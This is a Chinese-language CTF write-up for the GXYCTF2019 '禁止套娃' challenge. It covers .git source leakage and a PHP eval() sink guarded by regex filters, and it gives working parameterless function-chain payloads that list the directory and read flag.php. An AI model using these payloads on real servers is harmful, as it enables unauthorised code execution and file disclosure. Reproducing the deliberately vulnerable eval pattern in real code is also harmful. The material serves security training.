[GXYCTF2019]禁止套娃
知识点
- 无参数命令执行
- .git源码泄露
参考自php无参数函数利用
php无参数执行命令
[GXYCTF2019]禁止套娃
webscan扫描到有.git文件,使用GitHack下载到源码
<?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } } // highlight_file(__FILE__); ?>
其中
preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']) \(和\)表示转义括号 (?R)?表示引用当前表达式
大致意思就是可以使用函数,但是函数中不能有参数
localeconv() 函数返回一包含本地数字及货币格式信息的数组。
scandir() 列出 images 目录中的文件和目录。
readfile() 输出一个文件。
current() 返回数组中的当前单元, 默认取第一个值。
pos() current() 的别名。
next() 函数将内部指针指向数组中的下一个元素,并输出。
array_reverse()以相反的元素顺序返回数组。
highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。
查看有哪些文件
?exp=print_r(scandir(current(localeconv())));
最终payload
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
scandir(current(localeconv()))是查看当前目录 加上array_reverse()是将数组反转,即Array([0]=>index.php[1]=>flag.php=>[2].git[3]=>..[4]=>.) 再加上next()表示内部指针指向数组的下一个元素,并输出,即指向flag.php highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码